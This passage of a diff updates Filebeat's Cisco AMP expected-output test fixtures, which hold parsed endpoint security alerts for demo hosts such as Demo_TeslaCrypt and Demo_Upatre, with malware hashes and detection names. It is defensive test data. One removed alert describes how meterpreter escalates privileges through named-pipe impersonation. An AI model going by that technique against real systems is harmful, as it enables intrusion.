Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json index 7cd87985c4a..c26ba6d9286 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json @@ -420,119 +420,63 @@ ] }, { - "@timestamp": "2021-01-15T10:32:58.000Z", - "cisco.amp.cloud_ioc.description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.", - "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "27:85:29:21:67:49" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 1107296274, - "cisco.amp.file.disposition": "Clean", - "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006657", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "27:85:29:21:67:49" - ], - "cisco.amp.timestamp_nanoseconds": 322000000, - "event.action": "Cloud IOC", - "event.category": [ - "file" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 978000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 1476910664322001000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", "event.severity": 3, - "event.start": "2021-01-15T10:32:58.000Z", - "file.hash.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", - "file.name": "cmd.exe", - "file.path": "/C:/WINDOWS/system32/cmd.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Command_Line_Arguments_Meterpreter", - "host.name": "Demo_Command_Line_Arguments_Meterpreter", - "input.type": "log", - "log.offset": 25799, - "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9", - "related.hash": [ - "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" - ], - "related.hosts": [ - "Demo_Command_Line_Arguments_Meterpreter" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:27:39.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671385032556606", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 25000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533671385032557000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 27431, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 18534, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -540,64 +484,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55805, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:27:38.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671380737589308", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006661", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 605000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 947000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533671380737589000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 30074, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 19987, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -605,66 +556,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55809, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:26:38.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671123039551547", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006660", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 81000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 931000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533671123039551000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 31393, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 21440, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -672,3680 +628,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55808, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:26:37.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671118744584249", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006659", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 666000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533671118744584000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 34036, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:25:37.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533670861046546488", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 293000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670861046546000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 35355, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:25:36.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533670856751579190", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 880000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670856751579000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 38000, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:24:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.event_type_id": 1107296258, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 329000000, - "event.action": "Multiple Infected Files", - "event.category": [ - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 1489955900329000200, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:24:58.000Z", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "input.type": "log", - "log.offset": 39319, - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:23:01.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533670191031648309", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 947000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670191031648000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 40618, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:22:29.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.B1380FD95B-100.SBX.TG", - "cisco.amp.event_type_id": 1107296272, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 0, - "event.action": "Executed malware", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 15212386047828, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:22:29.000Z", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "file:///C%3A/ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "input.type": "log", - "log.offset": 44582, - "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:22:00.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669929038643250", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 973000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669929038643000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 45938, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:21:00.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669671340605487", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 333000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669671340605000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 49902, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:20:59.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669667045638188", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 779000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669667045638000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - 